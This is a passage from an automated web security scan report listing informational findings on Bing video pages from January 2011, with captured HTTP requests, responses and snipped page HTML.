<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.409. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 109040
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.578 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:38 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck" /><link rel="image_src" href="http://img4.catalog.video.redacted/Image.aspx?uuid=6655be07-f15e-4ca5-9397-d6d318a0017b&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fnews-9-makes-sure-you-know-its-snowing%2f1d07cesck%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.wmur.com&#47;video&#47;26532804&#47;index.html" data-instName="InfoRelatedLinks">Click here to watch</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.wmur.com&#47;video&#47;index.html" data-instName="InfoRelatedLinks">Click here for more video</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.wmur.com&#47;" data-instName="InfoRelatedLinks">Click here to visit WMUR</a>
...[SNIP]...
recast-6-30-pm-january-29-2011/1d2demk6i?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;6&#58;30&#32;PM&#32;--&#32;January&#32;29,&#32;2011" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b353d884-39d7-4d6b-983f-2fb9b9465fd0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ch/video/pm-weather-forecast-12911/1d25ut704?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Get&#32;the&#32;latest&#32;weather&#32;forecast&#32;from&#32;Doug&#32;Kammerer." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2cdbcfb1-944f-43d9-b168-a5519581f5fb&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-7-30-am-january-28-2011/1d202ry03?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;7&#58;30&#32;AM&#32;--&#32;January&#32;28,&#32;2011" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;747584ee-7da2-436e-b444-d7782c7b985a&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-8-30-am-january-26-2011/1d2ays3u1?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;8&#58;30&#32;AM&#32;--&#32;January&#32;26,&#32;2011" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;162a3a96-51bd-433d-9f2f-02ce47f429d4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rain&#32;on&#32;Sunday&#32;&#43;&#32;your&#32;7&#32;Day&#32;Outlook.&#32;&#32;More&#32;Weather&#32;updates&#32;&#64;&#32;www.facebook.com&#47;PabloNBCLA." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;ff066e8d-2b84-472e-8440-7780d7f70087&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ather-forecast-11-am-january-28-2011/1d2xikuhi?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;11&#32;AM&#32;--&#32;January&#32;28,&#32;2011" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;f062983e-76c8-4204-8870-1c92bac74c27&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-8-30-am-january-27-2011/1d273cnd6?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;8&#58;30&#32;AM&#32;--&#32;January&#32;27,&#32;2011" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;25d6772e-5c80-4e8d-a39f-0657c9f029aa&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
her-forecast-6-30-pm-june-27-2010/1d2fjlamo?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather&#32;Forecast&#32;--&#32;6&#58;30&#32;PM&#32;--&#32;June&#32;27,&#32;2010" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;922ed11b-a21d-4233-8927-8491c0f7a764&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
st&rel=MSN" class="motionThumb playerUrl"
title="NBC&#32;Connecticut&#32;meteorologist&#32;Darren&#32;Sweeney&#32;provides&#32;a&#32;look&#32;at&#32;the&#32;saturday&#32;daytime&#32;forecast." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;8ae02a9d-ad6e-4eba-b96d-0a4657d77100&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
pm-weather-forecast-01-28-11/1d2glbmb6?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Get&#32;the&#32;latest&#32;forecast&#32;from&#32;meteorologist&#32;Doug&#32;Kammerer." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;72f2e4f2-bac8-45a0-9db6-27a20d876b0c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.410. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 77783
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:17:39 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv" /><link rel="video_src" href="http://images.video.redacted/flash/customPlayer/1_0/customPlayer.swf?player.v=390a5af2-fac2-4e20-8b6e-4cc518d71596&amp;player.fullscreen=false&amp;player.ap=true&amp;mkt=en-US&amp;configName=syndicationplayer&amp;configCsid=msnvideo" type="" title="" /><link rel="image_src" href="http://img4.catalog.video.redacted/Image.aspx?uuid=390a5af2-fac2-4e20-8b6e-4cc518d71596&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2frio-exclusive-films-first-two-minutes%2f5eq4owv%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;movies.redacted&#47;movies&#47;movie.aspx&#63;m&#61;2278080" data-instName="InfoRelatedLinks">Learn more about 'Rio'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;movies.redacted&#47;comingsoon" data-instName="InfoRelatedLinks">Coming Soon</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;movies.redacted&#47;" data-instName="InfoRelatedLinks">MSN Movies</a>
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.411. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=819
Content-Length: 104380
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:06:06 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=DCC1C113BCC4431182D1F5899923D722; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f69fa639e58494b92dc419414b84b6c; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fryan-seacrest-part-1%2f17wnurhvy%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;jimmy-kimmel-live" data-instName="InfoRelatedLinks">Hulu - Jimmy Kimmel Live</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117771" data-instName="InfoRelatedLinks">Hulu Watch Page - Ryan Seacrest, Part 1</a>
...[SNIP]...
" class="motionThumb playerUrl"
title="In&#32;this&#32;episode&#32;of&#32;Celebritweets&#32;Theater,&#32;Ryan&#32;Seacrest&#32;pressures&#32;Simon&#32;Cowell&#32;into&#32;joining&#32;Twitter." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;79124421-113f-4242-b74d-1e211283c836&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-3/567mncf?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan&#32;Seacrest&#32;interviews&#32;Justin&#32;Bieber" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1f603c0d-45e1-43e0-84c6-ce39d8f646c9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
